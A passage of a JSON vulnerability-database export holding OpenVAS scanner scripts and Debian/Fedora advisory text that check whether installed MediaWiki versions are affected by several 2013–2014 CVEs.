vulnerabilities.", "cvss3": {}, "published": "2015-11-26T00:00:00", "type": "openvas", "title": "MediaWiki Multiple Vulnerabilities -02 Nov15 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310806632", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806632", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# MediaWiki Multiple Vulnerabilities -02 Nov15 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mediawiki:mediawiki\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806632\");\n script_version(\"2019-07-05T10:41:31+0000\");\n script_cve_id(\"CVE-2013-6452\", \"CVE-2013-6453\", \"CVE-2013-6454\", \"CVE-2013-6472\");\n script_bugtraq_id(65003);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 10:41:31 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-11-26 16:21:27 +0530 (Thu, 26 Nov 2015)\");\n script_name(\"MediaWiki Multiple Vulnerabilities -02 Nov15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with MediaWiki\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error which displays some information about deleted pages in the log\n API, enhanced RecentChanges, and user watchlists.\n\n - An error in CSS whose sanitization did not filter -o-link attributes.\n\n - An error leading SVG sanitization to bypass when the XML was considered\n invalid.\n\n - An error in SVG files upload that could lead to include external stylesheets\n in upload.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to conduct XSS attacks, gain access to sensitive information and\n have other some unspecified impact.\");\n\n script_tag(name:\"affected\", value:\"MediaWiki before 1.19.10, 1.2x 
before 1.21.4,\n and 1.22.x before 1.22.1 on Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 1.19.10 or 1.21.4 or\n 1.22.1 or later.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://lists.wikimedia.org/pipermail/mediawiki-announce/2014-January/000138.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"os_detection.nasl\", \"secpod_mediawiki_detect.nasl\");\n script_mandatory_keys(\"mediawiki/installed\", \"Host/runs_windows\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!http_port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!http_ver = get_app_version(cpe:CPE, port:http_port)){\n exit(0);\n}\n\nif(version_is_less(version:http_ver, test_version:\"1.19.10\"))\n{\n fix = \"1.19.10\";\n VULN = TRUE ;\n}\n\nelse if(version_in_range(version:http_ver, test_version:\"1.20\", test_version2:\"1.21.3\"))\n{\n fix = \"1.21.4\";\n VULN = TRUE ;\n}\n\nelse if(version_is_equal(version:http_ver, test_version:\"1.22.0\"))\n{\n fix = \"1.22.1\";\n VULN = TRUE ;\n}\n\nif(VULN)\n{\n report = 'Installed version: ' + http_ver + '\\n' +\n 'Fixed version: ' + fix + '\\n';\n security_message(port:http_port, data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-25T10:48:43", "description": "Check for the Version of mediawiki", "cvss3": {}, "published": "2014-03-12T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-3338", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-2244", "CVE-2014-2242", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2014-2243", "CVE-2013-6452", 
"CVE-2013-6454", "CVE-2013-6451"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:867564", "href": "http://plugins.openvas.org/nasl.php?oid=867564", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-3338\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867564);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-12 09:21:06 +0530 (Wed, 12 Mar 2014)\");\n script_cve_id(\"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\", \"CVE-2013-6454\",\n \"CVE-2013-6453\", \"CVE-2013-6472\", \"CVE-2014-2242\", \"CVE-2014-2243\",\n \"CVE-2014-2244\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-3338\");\n\n tag_insight = \"MediaWiki is the software used for Wikipedia and the other 
Wikimedia\nFoundation websites. Compared to other wikis, it has an excellent\nrange of features and support for high-traffic websites using multiple\nservers\n\nThis package supports wiki farms. Read the instructions for creating wiki\ninstances under /usr/share/doc/mediawiki/README.RPM.\nRemember to remove the config dir after completing the configuration.\n\";\n\n tag_affected = \"mediawiki on Fedora 20\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-3338\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-March/129882.html\");\n script_summary(\"Check for the Version of mediawiki\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.6~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:48:44", "description": "Check for the Version of mediawiki", "cvss3": {}, "published": "2014-03-12T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-3344", "bulletinFamily": 
"scanner", "cvss2": {}, "cvelist": ["CVE-2014-2244", "CVE-2014-2242", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2014-2243", "CVE-2013-6452", "CVE-2013-6454", "CVE-2013-6451"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:867562", "href": "http://plugins.openvas.org/nasl.php?oid=867562", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-3344\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867562);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-12 09:20:47 +0530 (Wed, 12 Mar 2014)\");\n script_cve_id(\"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\", \"CVE-2013-6454\",\n \"CVE-2013-6453\", \"CVE-2013-6472\", \"CVE-2014-2242\", \"CVE-2014-2243\", \"CVE-2014-2244\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-3344\");\n\n tag_insight = \"MediaWiki is the software used for Wikipedia and the other Wikimedia\nFoundation websites. Compared to other wikis, it has an excellent\nrange of features and support for high-traffic websites using multiple\nservers\n\nThis package supports wiki farms. 
Read the instructions for creating wiki\ninstances under /usr/share/doc/mediawiki-1.21.6/README.RPM.\nRemember to remove the config dir after completing the configuration.\n\";\n\n tag_affected = \"mediawiki on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-3344\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-March/129844.html\");\n script_summary(\"Check for the Version of mediawiki\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.6~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-02-04T18:49:50", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-03-12T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-3338", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-2244", "CVE-2014-2242", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2014-2243", "CVE-2013-6452", "CVE-2013-6454", 
"CVE-2013-6451"], "modified": "2020-02-04T00:00:00", "id": "OPENVAS:1361412562310867564", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867564", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-3338\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867564\");\n script_version(\"2020-02-04T09:04:16+0000\");\n script_tag(name:\"last_modification\", value:\"2020-02-04 09:04:16 +0000 (Tue, 04 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-03-12 09:21:06 +0530 (Wed, 12 Mar 2014)\");\n script_cve_id(\"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\", \"CVE-2013-6454\",\n \"CVE-2013-6453\", \"CVE-2013-6472\", \"CVE-2014-2242\", \"CVE-2014-2243\",\n \"CVE-2014-2244\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-3338\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n 
script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-3338\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-March/129882.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.6~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-04T18:49:25", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-03-12T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-3344", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-2244", "CVE-2014-2242", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2014-2243", "CVE-2013-6452", "CVE-2013-6454", "CVE-2013-6451"], "modified": "2020-02-04T00:00:00", "id": "OPENVAS:1361412562310867562", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867562", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update 
for mediawiki FEDORA-2014-3344\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867562\");\n script_version(\"2020-02-04T09:04:16+0000\");\n script_tag(name:\"last_modification\", value:\"2020-02-04 09:04:16 +0000 (Tue, 04 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-03-12 09:20:47 +0530 (Wed, 12 Mar 2014)\");\n script_cve_id(\"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\", \"CVE-2013-6454\",\n \"CVE-2013-6453\", \"CVE-2013-6472\", \"CVE-2014-2242\", \"CVE-2014-2243\", \"CVE-2014-2244\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-3344\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-3344\");\n script_xref(name:\"URL\", 
value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-March/129844.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.6~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-26T08:49:02", "description": "Several vulnerabilities were discovered in MediaWiki, a wiki engine.\nThe Common Vulnerabilities and Exposures project identifies the following\nissues:\n\nCVE-2013-2031 \nCross-site scripting attack via valid UTF-7 encoded sequences\nin a SVG file.\n\nCVE-2013-4567 & CVE-2013-4568 \nKevin Israel (Wikipedia user PleaseStand) reported two ways\nto inject Javascript due to an incomplete blacklist in the\nCSS sanitizer function.\n\nCVE-2013-4572 \nMediaWiki and the CentralNotice extension were incorrectly setting\ncache headers when a user was autocreated, causing the user's\nsession cookies to be cached, and returned to other users.\n\nCVE-2013-6452 \nChris from RationalWiki reported that SVG files could be\nuploaded that include external stylesheets, which could lead to\nXSS when an XSL was used to include JavaScript.\n\nCVE-2013-6453 \nMediaWiki's SVG sanitization could be bypassed when the XML was\nconsidered 
invalid.\n\nCVE-2013-6454 \nMediaWiki's CSS sanitization did not filter -o-link attributes,\nwhich could be used to execute JavaScript in Opera 12.\n\nCVE-2013-6472 \nMediaWiki displayed some information about deleted pages in\nthe log API, enhanced RecentChanges, and user watchlists.\n\nCVE-2014-1610 \nA remote code execution vulnerability existed if file upload\nsupport for DjVu (natively handled) or PDF files (in\ncombination with the PdfHandler extension) was enabled.\nNeither file type is enabled by default in MediaWiki.\n\nCVE-2014-2665 \nCross site request forgery in login form: an attacker could login\na victim as the attacker.", "cvss3": {}, "published": "2014-03-30T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2891-1 (mediawiki, mediawiki-extensions - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4567", "CVE-2013-2031", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-4568", "CVE-2013-6472", "CVE-2013-6452", "CVE-2014-2665", "CVE-2013-6454", "CVE-2013-4572"], "modified": "2017-07-11T00:00:00", "id": "OPENVAS:702891", "href": "http://plugins.openvas.org/nasl.php?oid=702891", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2891.nasl 6663 2017-07-11 09:58:05Z teissa $\n# Auto-generated from advisory DSA 2891-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or 
FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_affected = \"mediawiki, mediawiki-extensions on Debian Linux\";\ntag_solution = \"For the stable distribution (wheezy), these problems have been fixed in\nversion 1:1.19.14+dfsg-0+deb7u1 of the mediawiki package and 3.5~deb7u1\nof the mediawiki-extensions package.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:1.19.14+dfsg-1 of the mediawiki package and 3.5 of the\nmediawiki-extensions package.\n\nWe recommend that you upgrade your mediawiki packages.\";\ntag_summary = \"Several vulnerabilities were discovered in MediaWiki, a wiki engine.\nThe Common Vulnerabilities and Exposures project identifies the following\nissues:\n\nCVE-2013-2031 \nCross-site scripting attack via valid UTF-7 encoded sequences\nin a SVG file.\n\nCVE-2013-4567 & CVE-2013-4568 \nKevin Israel (Wikipedia user PleaseStand) reported two ways\nto inject Javascript due to an incomplete blacklist in the\nCSS sanitizer function.\n\nCVE-2013-4572 \nMediaWiki and the CentralNotice extension were incorrectly setting\ncache headers when a user was autocreated, causing the user's\nsession cookies to be cached, and returned to other users.\n\nCVE-2013-6452 \nChris from RationalWiki reported that SVG files could be\nuploaded that include external stylesheets, which could lead to\nXSS when an XSL was used to include JavaScript.\n\nCVE-2013-6453 \nMediaWiki's SVG sanitization could be bypassed when the XML was\nconsidered invalid.\n\nCVE-2013-6454 \nMediaWiki's CSS sanitization did not filter -o-link attributes,\nwhich could be used to execute JavaScript in Opera 12.\n\nCVE-2013-6472 \nMediaWiki displayed some information about deleted pages in\nthe log API, enhanced 
RecentChanges, and user watchlists.\n\nCVE-2014-1610 \nA remote code execution vulnerability existed if file upload\nsupport for DjVu (natively handled) or PDF files (in\ncombination with the PdfHandler extension) was enabled.\nNeither file type is enabled by default in MediaWiki.\n\nCVE-2014-2665 \nCross site request forgery in login form: an attacker could login\na victim as the attacker.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(702891);\n script_version(\"$Revision: 6663 $\");\n script_cve_id(\"CVE-2013-2031\", \"CVE-2013-4567\", \"CVE-2013-4568\", \"CVE-2013-4572\", \"CVE-2013-6452\", \"CVE-2013-6453\", \"CVE-2013-6454\", \"CVE-2013-6472\", \"CVE-2014-1610\", \"CVE-2014-2665\");\n script_name(\"Debian Security Advisory DSA 2891-1 (mediawiki, mediawiki-extensions - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-11 11:58:05 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-03-30 00:00:00 +0100 (Sun, 30 Mar 2014)\");\n script_tag(name: \"cvss_base\", value:\"10.0\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2891.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", 
value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"mediawiki\", ver:\"1:1.19.14+dfsg-0+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mediawiki\", ver:\"1:1.19.14+dfsg-0+deb7u1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mediawiki\", ver:\"1:1.19.14+dfsg-0+deb7u1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mediawiki\", ver:\"1:1.19.14+dfsg-0+deb7u1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-02-13T16:45:45", "description": "Several vulnerabilities were discovered in MediaWiki, a wiki engine.\nThe Common Vulnerabilities and Exposures project identifies the following\nissues:\n\nCVE-2013-2031\nCross-site scripting attack via valid UTF-7 encoded sequences\nin a SVG file.\n\nCVE-2013-4567 & CVE-2013-4568\nKevin Israel (Wikipedia user PleaseStand) reported two ways\nto inject Javascript due to an incomplete blacklist in the\nCSS sanitizer function.\n\nCVE-2013-4572\nMediaWiki and the CentralNotice extension were incorrectly setting\ncache headers when a user was autocreated, causing the user", "cvss3": {}, "published": "2014-03-30T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2891-1 (mediawiki, mediawiki-extensions - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4567", "CVE-2013-2031", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-4568", "CVE-2013-6472", "CVE-2013-6452", "CVE-2014-2665", "CVE-2013-6454", "CVE-2013-4572"], "modified": "2020-02-13T00:00:00", "id": "OPENVAS:1361412562310702891", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310702891", "sourceData": "# OpenVAS Vulnerability Test\n# Auto-generated from advisory DSA 2891-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.702891\");\n script_version(\"2020-02-13T09:17:49+0000\");\n script_cve_id(\"CVE-2013-2031\", \"CVE-2013-4567\", \"CVE-2013-4568\", \"CVE-2013-4572\", \"CVE-2013-6452\", \"CVE-2013-6453\", \"CVE-2013-6454\", \"CVE-2013-6472\", \"CVE-2014-1610\", \"CVE-2014-2665\");\n script_name(\"Debian Security Advisory DSA 2891-1 (mediawiki, mediawiki-extensions - security update)\");\n script_tag(name:\"last_modification\", value:\"2020-02-13 09:17:49 +0000 (Thu, 13 Feb 